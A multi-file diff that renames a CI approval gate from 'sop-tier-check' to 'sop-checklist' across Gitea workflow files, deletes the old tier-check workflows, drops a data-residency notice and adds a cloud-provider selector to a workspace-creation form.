|
||||
# High-risk class (RFC#450 Option C, governance-fix for internal#442).
|
||||
#
|
||||
# A PR is "high-risk" when ANY of the listed labels are applied OR when
|
||||
# the PR has `tier:high` (mechanically the strictest existing tier).
|
||||
# A PR is "high-risk" when ANY of the listed labels are applied.
|
||||
# High-risk items use `required_teams_high_risk` (when present on the
|
||||
# item); non-high-risk items use the default `required_teams`.
|
||||
#
|
||||
# This closes the inconsistency that the SOP charter already mandates
|
||||
# `tier:high → ceo only` for the sibling `sop-tier-check` gate; the
|
||||
# sop-checklist's `root-cause` and `no-backwards-compat` items now
|
||||
# follow the same risk-classed two-eyes shape:
|
||||
# - Default class (tier:low/medium, not high-risk): a non-author
|
||||
# engineers/managers/ceo ack satisfies the item — 25+ live
|
||||
# identities, no dependency on a dead/inactive senior persona
|
||||
# token.
|
||||
# - High-risk class (tier:high OR any high_risk_label): still
|
||||
# requires a non-author ceo ack (durable human team).
|
||||
# Risk-classed two-eyes shape:
|
||||
# - Default class (not high-risk): a non-author engineers/managers/ceo
|
||||
# ack satisfies the item — 25+ live identities, no dependency on a
|
||||
# dead/inactive senior persona token.
|
||||
# - High-risk class (any high_risk_label): still requires a non-author
|
||||
# ceo ack (durable human team).
|
||||
#
|
||||
# Tightening: add labels to high_risk_labels.
|
||||
# Loosening: remove labels.
|
||||
|
||||
@@ -13,14 +13,14 @@
|
||||
# the structured JSON shape is forward-compatible.
|
||||
#
|
||||
# Logic in `.gitea/scripts/audit-force-merge.sh` per the same script-
|
||||
# extract pattern as sop-tier-check.
|
||||
# extract pattern as sop-checklist.
|
||||
|
||||
name: audit-force-merge
|
||||
|
||||
# pull_request_target loads from the base branch — same security model
|
||||
# as sop-tier-check. Without this, an attacker could rewrite the
|
||||
# as sop-checklist. Without this, an attacker could rewrite the
|
||||
# workflow on a PR and skip the audit emission for their own
|
||||
# force-merge. See `.gitea/workflows/sop-tier-check.yml` for the full
|
||||
# force-merge. See `.gitea/workflows/sop-checklist.yml` for the full
|
||||
# rationale.
|
||||
on:
|
||||
pull_request_target:
|
||||
@@ -41,7 +41,7 @@ jobs:
|
||||
ref: ${{ github.event.pull_request.base.sha }}
|
||||
- name: Detect force-merge + emit audit event
|
||||
env:
|
||||
# Same org-level secret the sop-tier-check workflow uses.
|
||||
# Same org-level secret the sop-checklist workflow uses.
|
||||
GITEA_TOKEN: ${{ secrets.SOP_TIER_CHECK_TOKEN || secrets.GITHUB_TOKEN }}
|
||||
GITEA_HOST: git.moleculesai.app
|
||||
REPO: ${{ github.repository }}
|
||||
@@ -54,7 +54,7 @@ jobs:
|
||||
# required checks) for each branch listed here.
|
||||
#
|
||||
# Declared here rather than fetched from /branch_protections
|
||||
# because that endpoint requires admin write — sop-tier-bot is
|
||||
# because that endpoint requires admin write — sop-checklist-bot is
|
||||
# read-only by design (least-privilege).
|
||||
REQUIRED_CHECKS_JSON: |
|
||||
{
|
||||
|
||||
@@ -12,7 +12,7 @@
|
||||
# (SHA 0adf2098) per RFC internal#219 Phase 2b+c — replicate repo-by-repo.
|
||||
#
|
||||
# When any pair diverges, a `[ci-drift]` issue is opened or updated
|
||||
# (idempotent by title) and labelled `tier:high`. This is the
|
||||
# (idempotent by title) and labelled `ci-bp-drift`. This is the
|
||||
# auto-detection that closes the regression class identified in
|
||||
# RFC §1 finding 3 (protection only listed 2 of 6 real jobs for
|
||||
# ~weeks, undetected) and §6 (audit env drifts silently from
|
||||
@@ -106,7 +106,7 @@ jobs:
|
||||
AUDIT_WORKFLOW_PATH: '.gitea/workflows/audit-force-merge.yml'
|
||||
# Path to the CI workflow with the sentinel + the jobs.
|
||||
CI_WORKFLOW_PATH: '.gitea/workflows/ci.yml'
|
||||
# Issue label applied on file/update. `tier:high` exists in
|
||||
# Issue label applied on file/update. `ci-bp-drift` exists in
|
||||
# the molecule-core label set (verified 2026-05-11, label id 9).
|
||||
DRIFT_LABEL: 'tier:high'
|
||||
DRIFT_LABEL: 'ci-bp-drift'
|
||||
run: python3 .gitea/scripts/ci-required-drift.py
|
||||
|
||||
@@ -499,7 +499,7 @@ jobs:
|
||||
# `CI / all-required (pull_request)` per issue #1473.
|
||||
#
|
||||
# Closes the failure mode where status_check_contexts on molecule-core/main
|
||||
# only listed `Secret scan` + `sop-tier-check` (the 2 meta-gates), so real
|
||||
# only listed `Secret scan` + `sop-checklist` (the 2 meta-gates), so real
|
||||
# `Platform (Go)` / `Canvas (Next.js)` / `Python Lint & Test` / `Shellcheck`
|
||||
# red silently merged through. See internal#286 for the three concrete
|
||||
# tonight-of-2026-05-11 incidents that prompted the emergency bump.
|
||||
|
||||
@@ -73,7 +73,7 @@ jobs:
|
||||
# NOTE: REQUIRED_CONTEXTS is no longer the authoritative PR gate. The
|
||||
# queue now reads the required status contexts from BRANCH PROTECTION
|
||||
# (status_check_contexts) so non-required governance reds (qa-review,
|
||||
# security-review, sop-tier, sop-checklist when not branch-required,
|
||||
# security-review, sop-checklist when not branch-required,
|
||||
# E2E Chat, Staging SaaS, ci-arm64-advisory) cannot block a merge.
|
||||
# If branch protection cannot be enumerated the queue HOLDS
|
||||
# (fail-closed). REQUIRED_APPROVALS below is only a fallback used when
|
||||
|
||||
@@ -19,7 +19,7 @@
|
||||
# Forward-compat scope:
|
||||
# Today (2026-05-11) molecule-core/main protects 3 contexts:
|
||||
# - "Secret scan / Scan diff for credential-shaped strings (pull_request)"
|
||||
# - "sop-tier-check / tier-check (pull_request)"
|
||||
# - "sop-checklist / tier-check (pull_request)"
|
||||
# - "CI / all-required (pull_request)"
|
||||
# Per RFC#324 Step 2 the required-list expands to ~5 contexts
|
||||
# (qa-review, security-review added). Each new required context's
|
||||
|
||||
@@ -16,7 +16,7 @@ name: Lint workflow YAML (Gitea-1.22.6-hostile shapes)
|
||||
#
|
||||
# Empirical history this hardens against:
|
||||
# - status-reaper rev1 caught rule-4 (name-collision) class
|
||||
# - sop-tier-refire DOA'd on rule-2 (workflow_run partial)
|
||||
# - sop-checklist DOA'd on rule-2 (workflow_run partial)
|
||||
# - #319 bootstrap-paradox (chained-defect class, related)
|
||||
# - internal#329 dispatcher race (adjacent)
|
||||
# - 2026-05-11 publish-runtime: rule-1, 24h PyPI freeze
|
||||
|
||||
@@ -95,10 +95,10 @@ jobs:
|
||||
# included here — staging green is a separate gate
|
||||
# (`feedback_staging_e2e_merge_gate`).
|
||||
WATCH_BRANCH: 'main'
|
||||
# Issue label applied on file/open. `tier:high` exists in the
|
||||
# Issue label applied on file/open. `ci-bp-drift` exists in the
|
||||
# molecule-core label set (verified 2026-05-11, label id 9).
|
||||
# Rationale for high: main red blocks the promotion train and
|
||||
# poisons every PR's auto-rebase base; treat as a fire even
|
||||
# if intermittent.
|
||||
RED_LABEL: 'tier:high'
|
||||
RED_LABEL: 'ci-bp-drift'
|
||||
run: python3 .gitea/scripts/main-red-watchdog.py
|
||||
|
||||
@@ -12,9 +12,9 @@
|
||||
# - `pull_request_review` types: [submitted]
|
||||
# → re-evaluate when a team member submits an APPROVE review so
|
||||
# the gate flips immediately (no wait for the next push or
|
||||
# slash-command). Verified live: sop-tier-check.yml uses this
|
||||
# slash-command). Verified live: sop-checklist.yml uses this
|
||||
# same event and provably fires (produces
|
||||
# `sop-tier-check / tier-check (pull_request_review)` contexts).
|
||||
# `sop-checklist / all-items-acked (pull_request_review)` contexts).
|
||||
# The job-level `if:` guard checks
|
||||
# `github.event.review.state == 'APPROVED' || 'approved'` so
|
||||
# only APPROVE reviews run the evaluator; COMMENT and
|
||||
@@ -53,7 +53,7 @@
|
||||
#
|
||||
# We MUST NOT use `github.event.comment.author_association` (the
|
||||
# field doesn't exist on Gitea 1.22.6 webhook payload — this was
|
||||
# sop-tier-refire's defect #1).
|
||||
# 's defect #1).
|
||||
#
|
||||
# A4 (no PR-head checkout under pull_request_target):
|
||||
# We check out the BASE ref explicitly so the review-check.sh script is
|
||||
@@ -73,7 +73,7 @@
|
||||
# also not in qa/security teams → also 403.
|
||||
#
|
||||
# Resolution: a dedicated `RFC_324_TEAM_READ_TOKEN` secret, owned by an
|
||||
# identity that IS in both `qa` and `security` teams (Owners-tier
|
||||
# identity that IS in both `qa` and `security` teams (Owners-level
|
||||
# claude-ceo-assistant, or a new service-bot added to both teams).
|
||||
# Provisioning of this secret is tracked as a follow-up issue (filed by
|
||||
# core-devops at PR open).
|
||||
|
||||
@@ -10,8 +10,8 @@
|
||||
# A1-α addendum (internal#760): review-event trigger added so the security
|
||||
# gate flips immediately when a team member submits an APPROVE review.
|
||||
# Uses `pull_request_review` types: [submitted] — verified live via
|
||||
# sop-tier-check.yml which provably fires this event (produces
|
||||
# `sop-tier-check / tier-check (pull_request_review)` contexts).
|
||||
# sop-checklist.yml which provably fires this event (produces
|
||||
# `sop-checklist / all-items-acked (pull_request_review)` contexts).
|
||||
# The job-level `if:` guard checks
|
||||
# `github.event.review.state == 'APPROVED' || 'approved'` so only APPROVE
|
||||
# reviews run the evaluator; COMMENT and REQUEST_CHANGES are skipped at
|
||||
|
||||
@@ -14,10 +14,10 @@
|
||||
# Fix (PR #1345 / issue #1280):
|
||||
# - ONE workflow, ONE issue_comment:[created] subscription (no edited/deleted)
|
||||
# - all-items-acked job: pull_request_target OR sop slash-command comments
|
||||
# - review-refire job: qa/security/tier refire slash commands
|
||||
# - review-refire job: qa/security refire slash commands
|
||||
# → ~50% reduction in comment-triggered runner occupancy vs pre-fix.
|
||||
#
|
||||
# Trust boundary (mirrors RFC#324 §A4 + sop-tier-check security note):
|
||||
# Trust boundary (mirrors RFC#324 §A4 + sop-checklist security note):
|
||||
# `pull_request_target` (not `pull_request`) — workflow def is loaded
|
||||
# from BASE branch, so a PR cannot rewrite this workflow to exfiltrate
|
||||
# the token. The `actions/checkout` step pins `ref: base.sha` so the
|
||||
@@ -34,14 +34,6 @@
|
||||
# via a repo secret `SOP_CHECKLIST_GATE_TOKEN`. Provisioning of that
|
||||
# secret is a follow-up authorization step (separate from this PR).
|
||||
#
|
||||
# Failure mode: tier-aware (RFC#351 open question 2):
|
||||
# - tier:high → state=failure (hard-fail; BP blocks merge)
|
||||
# - tier:medium → state=failure (hard-fail; same)
|
||||
# - tier:low → state=pending (soft-fail; BP can choose to require
|
||||
# this context or skip for low-tier PRs)
|
||||
# - missing/no-tier → state=failure (default-mode: hard — never lower
|
||||
# the bar per feedback_fix_root_not_symptom)
|
||||
#
|
||||
# Slash-command contract (RFC#351 v1 + §A1.1-style notes from RFC#324):
|
||||
#
|
||||
# /sop-ack <slug-or-numeric-alias> [optional note]
|
||||
@@ -61,7 +53,7 @@
|
||||
# — declare a gate (qa-review, security-review) N/A.
|
||||
# — see sop-checklist-config.yaml n/a_gates section.
|
||||
#
|
||||
# /qa-recheck /security-recheck /refire-tier-check
|
||||
# /qa-recheck /security-recheck
|
||||
# — refire the corresponding status check on the PR head.
|
||||
#
|
||||
# The eval is read-only + idempotent (read PR + comments + team
|
||||
@@ -149,7 +141,6 @@ jobs:
|
||||
{
|
||||
echo "run_qa=false"
|
||||
echo "run_security=false"
|
||||
echo "run_tier=false"
|
||||
} >> "$GITHUB_OUTPUT"
|
||||
first_line=$(printf '%s\n' "$COMMENT_BODY" | sed -n '1p')
|
||||
case "$first_line" in
|
||||
@@ -159,9 +150,6 @@ jobs:
|
||||
/security-recheck*)
|
||||
echo "run_security=true" >> "$GITHUB_OUTPUT"
|
||||
;;
|
||||
/refire-tier-check*)
|
||||
echo "run_tier=true" >> "$GITHUB_OUTPUT"
|
||||
;;
|
||||
*)
|
||||
echo "::notice::no supported review refire slash command; no-op"
|
||||
;;
|
||||
@@ -170,8 +158,7 @@ jobs:
|
||||
- name: Check out BASE ref for trusted scripts
|
||||
if: |
|
||||
steps.classify.outputs.run_qa == 'true' ||
|
||||
steps.classify.outputs.run_security == 'true' ||
|
||||
steps.classify.outputs.run_tier == 'true'
|
||||
steps.classify.outputs.run_security == 'true'
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
|
||||
with:
|
||||
ref: ${{ github.event.repository.default_branch }}
|
||||
@@ -213,13 +200,3 @@ jobs:
|
||||
run: |
|
||||
set -euo pipefail
|
||||
.gitea/scripts/review-refire-status.sh
|
||||
|
||||
- name: Refire sop-tier-check status
|
||||
if: steps.classify.outputs.run_tier == 'true'
|
||||
env:
|
||||
GITEA_TOKEN: ${{ secrets.SOP_TIER_CHECK_TOKEN || secrets.GITHUB_TOKEN }}
|
||||
GITEA_HOST: git.moleculesai.app
|
||||
REPO: ${{ github.repository }}
|
||||
PR_NUMBER: ${{ github.event.issue.number }}
|
||||
SOP_DEBUG: '0'
|
||||
run: bash .gitea/scripts/sop-tier-refire.sh
|
||||
|
||||
@@ -1,162 +0,0 @@
|
||||
# sop-tier-check — canonical Gitea Actions workflow for §SOP-6 enforcement.
|
||||
#
|
||||
# Logic lives in `.gitea/scripts/sop-tier-check.sh` (extracted 2026-05-09
|
||||
# from the previous inline-bash version). The script is the single source
|
||||
# of truth; this workflow file just sets env + invokes it.
|
||||
#
|
||||
# Copy BOTH files (`.gitea/workflows/sop-tier-check.yml` +
|
||||
# `.gitea/scripts/sop-tier-check.sh`) into any repo that wants the
|
||||
# §SOP-6 PR gate enforced. Pair with branch protection on the protected
|
||||
# branch:
|
||||
# required_status_checks: ["sop-tier-check / tier-check (pull_request)"]
|
||||
# required_approving_reviews: 1
|
||||
# approving_review_teams: ["ceo", "managers", "engineers"]
|
||||
#
|
||||
# Tier → required-team expression (internal#189 AND-composition):
|
||||
# tier:low → engineers,managers,ceo (OR: any one suffices)
|
||||
# tier:medium → managers AND engineers AND qa???,security??? (AND: all required)
|
||||
# tier:high → ceo (OR: single team, wired for AND)
|
||||
#
|
||||
# "???" = teams not yet created in Gitea. When qa + security teams are
|
||||
# added, update TIER_EXPR["tier:medium"] in the script to remove the
|
||||
# markers. PRs already in-flight when qa/security are created continue
|
||||
# to work because their authors explicitly requested those reviews.
|
||||
#
|
||||
# Force-merge: Owners-team override remains available out-of-band via
|
||||
# the Gitea merge API; force-merge writes `incident.force_merge` to
|
||||
# `structure_events` per §Persistent structured logging gate (Phase 3).
|
||||
#
|
||||
# Environment variables:
|
||||
# SOP_DEBUG=1 — per-API-call diagnostic lines. Default: off.
|
||||
# SOP_LEGACY_CHECK=1 — revert to OR-gate for this run. Intended for
|
||||
# emergency use only; burn-in window closed
|
||||
# 2026-05-17 (internal#189 Phase 1).
|
||||
#
|
||||
# BURN-IN CLOSED 2026-05-17 (internal#189 Phase 1): The 7-day burn-in
|
||||
# window closed. As of 2026-06-04 the residual masks left behind by the
|
||||
# burn-in are removed for real (the comment previously claimed this while
|
||||
# the masks still persisted — that was stale):
|
||||
# - continue-on-error: true on the jq-install step (redundant; the step
|
||||
# already exits 0) and on the tier-check step (the burn-in mask).
|
||||
# - the `|| true` after the sop-tier-check.sh invocation, which masked
|
||||
# real tier-gate verdicts.
|
||||
# AND-composition is now fully enforced and the tier-check step can
|
||||
# honestly red CI on a real SOP-6 violation.
|
||||
#
|
||||
# SOP_FAIL_OPEN REMOVED 2026-06-05 (fix/core-ci-fail-closed): this is a
|
||||
# REQUIRED branch-protected gate on `pull_request_target` (always
|
||||
# same-repo, secrets always present — no fork/advisory split). Failing
|
||||
# open on a token/network/jq fault greened the SOP-6 approval gate
|
||||
# WITHOUT verifying approvals — a fail-open on a required context. The
|
||||
# gate now FAILS CLOSED on infra faults too: fix the token/runner, not
|
||||
# the gate. If you ever need to temporarily re-introduce a mask, file a
|
||||
# tracker and follow the mc#1982 protocol.
|
||||
|
||||
name: sop-tier-check
|
||||
|
||||
# SECURITY: triggers MUST use `pull_request_target`, not `pull_request`.
|
||||
# `pull_request_target` loads the workflow definition from the BASE
|
||||
# branch (i.e. `main`), not the PR's HEAD. With `pull_request`, anyone
|
||||
# with write access to a feature branch could rewrite this file in
|
||||
# their PR to dump SOP_TIER_CHECK_TOKEN (org-read scope) to logs and
|
||||
# exfiltrate it. Verified 2026-05-09 against Gitea 1.22.6 —
|
||||
# `pull_request_target` (added in Gitea 1.21 via go-gitea/gitea#25229)
|
||||
# is the documented mitigation.
|
||||
#
|
||||
# This workflow does NOT call `actions/checkout` of PR HEAD code, so no
|
||||
# untrusted code is ever executed in the runner — we only HTTP-call the
|
||||
# Gitea API. If a future change adds a checkout step, it MUST pin to
|
||||
# `${{ github.event.pull_request.base.sha }}` (NOT `head.sha`) to keep
|
||||
# the trust boundary.
|
||||
on:
|
||||
pull_request_target:
|
||||
types: [opened, edited, synchronize, reopened, labeled, unlabeled]
|
||||
pull_request_review:
|
||||
types: [submitted, dismissed, edited]
|
||||
|
||||
concurrency:
|
||||
group: ${{ github.repository }}-${{ github.workflow }}-${{ github.event.pull_request.number || github.ref }}
|
||||
cancel-in-progress: true
|
||||
|
||||
jobs:
|
||||
tier-check:
|
||||
runs-on: ubuntu-latest
|
||||
permissions:
|
||||
contents: read
|
||||
pull-requests: read
|
||||
secrets: read
|
||||
steps:
|
||||
- name: Check out base branch (for the script)
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
|
||||
with:
|
||||
# Pin to base.sha — pull_request_target's protection only
|
||||
# works if we never check out PR HEAD. Same SHA the workflow
|
||||
# itself was loaded from.
|
||||
ref: ${{ github.event.pull_request.base.sha }}
|
||||
- name: Install jq
|
||||
# Gitea Actions runners (ubuntu-latest label) do not bundle jq.
|
||||
# The sop-tier-check script uses jq for all JSON API parsing.
|
||||
# Install jq before the script runs so sop-tier-check can pass.
|
||||
#
|
||||
# Method: apt-get first (reliable for Ubuntu runners with internet
|
||||
# access to package mirrors). Falls back to GitHub binary download.
|
||||
# GitHub releases may be unreachable from some runner networks
|
||||
# (infra#241 follow-up: GitHub timeout after 3s on 5.78.80.188
|
||||
# runners). The sop-tier-check script has its own fallback as a
|
||||
# third line of defense, and this step's final command
|
||||
# (`jq --version ... || echo`) already exits 0 unconditionally — so
|
||||
# the step cannot fail the job on its own.
|
||||
# continue-on-error REMOVED 2026-06-04 (mc#1982 directive: root-fix
|
||||
# and remove, do not renew). It was redundant masking, not a gate.
|
||||
run: |
|
||||
# apt-get is the primary method — Ubuntu package mirrors are reliably
|
||||
# reachable from runner containers. GitHub releases may be blocked
|
||||
# or slow on some networks (infra#241 follow-up).
|
||||
if apt-get update -qq && apt-get install -y -qq jq; then
|
||||
echo "::notice::jq installed via apt-get: $(jq --version)"
|
||||
elif timeout 120 curl -sSL \
|
||||
"https://github.com/jqlang/jq/releases/download/jq-1.7.1/jq-linux-amd64" \
|
||||
-o /usr/local/bin/jq && chmod +x /usr/local/bin/jq; then
|
||||
echo "::notice::jq binary downloaded: $(/usr/local/bin/jq --version)"
|
||||
else
|
||||
echo "::warning::jq install failed — apt-get and GitHub download both failed."
|
||||
fi
|
||||
jq --version 2>/dev/null || echo "::notice::jq not yet available — script fallback will retry"
|
||||
|
||||
- name: Verify tier label + reviewer team membership
|
||||
# continue-on-error REMOVED 2026-06-04 (expired internal#189 Phase 1
|
||||
# burn-in, window closed 2026-05-17; mc#1982 directive: root-fix and
|
||||
# remove, do not renew). SOP_FAIL_OPEN REMOVED 2026-06-05
|
||||
# (fix/core-ci-fail-closed): the gate now fails CLOSED on infra
|
||||
# faults too (see the env block below), not just on a real verdict.
|
||||
env:
|
||||
GITEA_TOKEN: ${{ secrets.SOP_TIER_CHECK_TOKEN || secrets.GITHUB_TOKEN }}
|
||||
GITEA_HOST: git.moleculesai.app
|
||||
REPO: ${{ github.repository }}
|
||||
PR_NUMBER: ${{ github.event.pull_request.number }}
|
||||
PR_AUTHOR: ${{ github.event.pull_request.user.login }}
|
||||
SOP_DEBUG: '0'
|
||||
SOP_LEGACY_CHECK: '0'
|
||||
# SOP_FAIL_OPEN REMOVED 2026-06-05 (fix/core-ci-fail-closed).
|
||||
#
|
||||
# This is the REQUIRED branch-protected gate
|
||||
# `sop-tier-check / tier-check (pull_request)`. It runs on
|
||||
# `pull_request_target`, which ALWAYS executes from the base
|
||||
# branch WITH secrets present — there is NO fork/advisory split
|
||||
# and no legitimate "secrets genuinely absent" degradation here.
|
||||
#
|
||||
# SOP_FAIL_OPEN=1 made the script `exit 0` on an empty/invalid
|
||||
# token, an unreachable Gitea API, or missing jq — i.e. an AUTH
|
||||
# FAILURE or unreachable-dependency would green the SOP-6
|
||||
# approval gate WITHOUT verifying that the required teams
|
||||
# actually approved. That is a fail-open on a required gate: a
|
||||
# mis-wired or under-scoped SOP_TIER_CHECK_TOKEN would let any PR
|
||||
# merge past the approval requirement.
|
||||
#
|
||||
# Removing the env unsets it → `${SOP_FAIL_OPEN:-}` is empty in
|
||||
# sop-tier-check.sh → every guarded `exit 0` branch instead falls
|
||||
# through to `exit 1`. Infra faults (bad token / API down / no
|
||||
# jq) now FAIL CLOSED with a loud `::error::`, exactly like a real
|
||||
# SOP-6 violation. Fix the token/runner, not the gate.
|
||||
run: |
|
||||
bash .gitea/scripts/sop-tier-check.sh
|
||||
@@ -1,52 +0,0 @@
|
||||
# sop-tier-refire — manual fallback for sop-tier-check refire.
|
||||
#
|
||||
# Closes internal#292. Gitea 1.22.6 doesn't refire workflows on the
|
||||
# `pull_request_review` event (go-gitea/gitea#33700); the `sop-tier-check`
|
||||
# workflow's review-event subscription is silently dead. The result:
|
||||
# PRs that get their approving review AFTER the tier-check ran on open/
|
||||
# synchronize keep their failing status check forever, and the only way
|
||||
# to merge is the admin force-merge path (audited via `audit-force-merge`
|
||||
# but the audit trail keeps growing; see `feedback_never_admin_merge_bypass`).
|
||||
#
|
||||
# Comment-triggered refires now live in `review-refire-comments.yml`. Gitea
|
||||
# queues issue_comment workflows before evaluating job-level `if:`, so having
|
||||
# qa-review, security-review, sop-checklist, and sop-tier-refire all subscribe
|
||||
# to every comment caused queue storms on SOP-heavy PRs. This workflow is a
|
||||
# non-automatic breadcrumb only; Gitea 1.22.6 does not support
|
||||
# workflow_dispatch inputs, so real refires must use `/refire-tier-check`.
|
||||
#
|
||||
# SECURITY MODEL:
|
||||
#
|
||||
# 1. `pull_request` exists on the issue (issue_comment fires on issues
|
||||
# AND PRs; we only want PRs).
|
||||
# 2. `comment.author_association` must be MEMBER/OWNER/COLLABORATOR.
|
||||
# Per the internal#292 core-security review (review#1066 ask): anyone
|
||||
# can comment, but only repo collaborators+ can flip the status.
|
||||
# Without this gate, a drive-by commenter on a public-issue-tracker
|
||||
# surface could trigger a status flip.
|
||||
# 3. Comment body must contain `/refire-tier-check` — a slash-command-
|
||||
# shaped trigger (not just any comment word). Prevents accidental
|
||||
# triggering from prose like "we should refire tests" in a review.
|
||||
# 4. This workflow does NOT check out PR HEAD code. Like sop-tier-check,
|
||||
# it only HTTP-calls the Gitea API. Trust boundary preserved.
|
||||
#
|
||||
# Note: `issue_comment` fires from the BASE branch's workflow file. There
|
||||
# is no `pull_request_target` equivalent to set; the trigger inherently
|
||||
# loads the workflow from the default branch.
|
||||
#
|
||||
# Rate-limit: a 1s pre-sleep + a "skip if status posted in last 30s"
|
||||
# guard prevents comment-spam from thrashing the status. See the script.
|
||||
|
||||
name: sop-tier-check refire (manual)
|
||||
|
||||
on:
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
refire:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Explain supported refire path
|
||||
run: |
|
||||
echo "::error::Gitea 1.22.6 does not support workflow_dispatch inputs here; comment /refire-tier-check on the PR instead."
|
||||
exit 1
|
||||
@@ -26,7 +26,7 @@ name: verify-providers-gen
|
||||
# * It is intentionally absent from ci.yml's job set so the ci-required-drift
|
||||
# sentinel (jobs ↔ branch-protection ↔ audit-env) does NOT fire on it, and
|
||||
# from branch protection (turning it into a hard merge gate has blast radius
|
||||
# — operator GO required, same pattern as sop-tier-check / verify-providers-gen
|
||||
# — operator GO required, same pattern as sop-checklist / verify-providers-gen
|
||||
# on controlplane). Promote it into branch protection in a follow-up once
|
||||
# P2 has soaked.
|
||||
# Until then it behaves like secret-scan / block-internal-paths: a standalone
|
||||
|
||||
@@ -179,7 +179,6 @@ function Shell({
|
||||
<p className="mt-2 text-ink-mid">
|
||||
Each org is an isolated Molecule workspace.
|
||||
</p>
|
||||
<DataResidencyNotice />
|
||||
<div className="mt-8">{children}</div>
|
||||
</div>
|
||||
</TermsGate>
|
||||
@@ -220,25 +219,6 @@ function AccountBar({ session }: { session: Session }) {
|
||||
</div>
|
||||
);
|
||||
}
|
||||
|
||||
// DataResidencyNotice surfaces where workspace data lives so EU-based
|
||||
// signups can make an informed choice (GDPR Art. 13 disclosure
|
||||
// requirement). Plain text, no icon — the goal is clarity, not
|
||||
// decoration. A future EU region selector can replace this with a
|
||||
// region dropdown.
|
||||
function DataResidencyNotice() {
|
||||
return (
|
||||
<p className="mt-3 rounded border border-line bg-surface-sunken/60 px-3 py-2 text-xs text-ink-mid">
|
||||
Workspaces run in AWS us-east-2 (Ohio, United States). EU region support is on the roadmap — reach out to
|
||||
{" "}
|
||||
<a href="mailto:support@moleculesai.app" className="underline">
|
||||
support@moleculesai.app
|
||||
</a>
|
||||
{" "}if you need data residency in another region today.
|
||||
</p>
|
||||
);
|
||||
}
|
||||
|
||||
function OrgRow({ org }: { org: Org }) {
|
||||
return (
|
||||
<li className="rounded-lg border border-line bg-surface-sunken p-4">
|
||||
|
||||
@@ -60,6 +60,16 @@ const BASE_RUNTIME_TEMPLATE_IDS = new Set(["claude-code-default", "codex", "goog
|
||||
const DEFAULT_HEADLESS_INSTANCE_TYPE = "t3.medium";
|
||||
const DEFAULT_HEADLESS_ROOT_GB = 30;
|
||||
const DEFAULT_DISPLAY_INSTANCE_TYPE = "t3.xlarge";
|
||||
|
||||
// Per-workspace cloud/compute backend (multi-provider RFC). "aws" is the default
|
||||
// EC2 path; "gcp"/"hetzner" route to the matching CP WorkspaceProvisioner. A
|
||||
// workspace whose cloud differs from its tenant's is reached over a per-workspace
|
||||
// Cloudflare tunnel (runtime#95). Distinct from the LLM/model provider.
|
||||
const CLOUD_PROVIDER_OPTIONS = [
|
||||
{ value: "aws", label: "AWS (default)" },
|
||||
{ value: "gcp", label: "GCP" },
|
||||
{ value: "hetzner", label: "Hetzner" },
|
||||
];
|
||||
const DEFAULT_DISPLAY_ROOT_GB = 80;
|
||||
|
||||
export function CreateWorkspaceButton() {
|
||||
@@ -77,6 +87,10 @@ export function CreateWorkspaceButton() {
|
||||
const [displayInstanceType, setDisplayInstanceType] = useState(DEFAULT_DISPLAY_INSTANCE_TYPE);
|
||||
const [displayRootGB, setDisplayRootGB] = useState(String(DEFAULT_DISPLAY_ROOT_GB));
|
||||
const [displayResolution, setDisplayResolution] = useState("1920x1080");
|
||||
// Cloud/compute backend for the workspace box (multi-provider, per-workspace).
|
||||
// "aws" default; "gcp"/"hetzner" route to the matching CP WorkspaceProvisioner
|
||||
// (a non-tenant-cloud box is reached over a per-workspace tunnel, runtime#95).
|
||||
const [cloudProvider, setCloudProvider] = useState("aws");
|
||||
// Templates fetched from /api/templates — drives the dynamic provider
|
||||
// filter below. Same data source ConfigTab uses (PR #2454). When the
|
||||
// selected template declares `runtime_config.providers` in its
|
||||
@@ -266,6 +280,7 @@ export function CreateWorkspaceButton() {
|
||||
setDisplayInstanceType(DEFAULT_DISPLAY_INSTANCE_TYPE);
|
||||
setDisplayRootGB(String(DEFAULT_DISPLAY_ROOT_GB));
|
||||
setDisplayResolution("1920x1080");
|
||||
setCloudProvider("aws");
|
||||
setExternalRuntime("external");
|
||||
setLLMSelection({ providerId: "", model: "", envVars: [] });
|
||||
setLLMSecret("");
|
||||
@@ -355,11 +370,16 @@ export function CreateWorkspaceButton() {
|
||||
width: Number.isFinite(displayWidth) ? displayWidth : 1920,
|
||||
height: Number.isFinite(displayHeight) ? displayHeight : 1080,
|
||||
},
|
||||
// Only meaningful when CP provisions the box (SaaS), where
|
||||
// the picker is shown. Omit on self-hosted so the payload is
|
||||
// unchanged there.
|
||||
...(isSaaS ? { provider: cloudProvider } : {}),
|
||||
}
|
||||
: {
|
||||
instance_type: DEFAULT_HEADLESS_INSTANCE_TYPE,
|
||||
volume: { root_gb: DEFAULT_HEADLESS_ROOT_GB },
|
||||
display: { mode: "none" },
|
||||
...(isSaaS ? { provider: cloudProvider } : {}),
|
||||
},
|
||||
}
|
||||
: {}),
|
||||
@@ -599,6 +619,26 @@ export function CreateWorkspaceButton() {
|
||||
<div className="mb-2 text-[11px] font-medium text-ink-mid">
|
||||
Container Config
|
||||
</div>
|
||||
{/* Cloud provider — only meaningful when CP provisions the box
|
||||
(SaaS). A non-tenant-cloud workspace is reached over a
|
||||
per-workspace Cloudflare tunnel (runtime#95). */}
|
||||
{isSaaS && (
|
||||
<label htmlFor="workspace-cloud-provider" className="mb-3 grid gap-1">
|
||||
<span className="text-xs font-medium text-ink">Cloud provider</span>
|
||||
<select
|
||||
id="workspace-cloud-provider"
|
||||
value={cloudProvider}
|
||||
onChange={(e) => setCloudProvider(e.target.value)}
|
||||
className="w-full bg-surface-card/60 border border-line/50 rounded-lg px-3 py-2 text-sm text-ink focus:outline-none focus:border-accent/60 focus:ring-1 focus:ring-accent/20 transition-colors"
|
||||
>
|
||||
{CLOUD_PROVIDER_OPTIONS.map((p) => (
|
||||
<option key={p.value} value={p.value}>
|
||||
{p.label}
|
||||
</option>
|
||||
))}
|
||||
</select>
|
||||
</label>
|
||||
)}
|
||||
<label className="flex items-center justify-between gap-3">
|
||||
<span className="text-xs font-medium text-ink">Display</span>
|
||||
<input
|
||||
|
||||
@@ -12,6 +12,7 @@ import {
|
||||
ProviderModelSelector,
|
||||
buildProviderCatalog,
|
||||
findProviderForModel,
|
||||
isPlatformManagedProvider,
|
||||
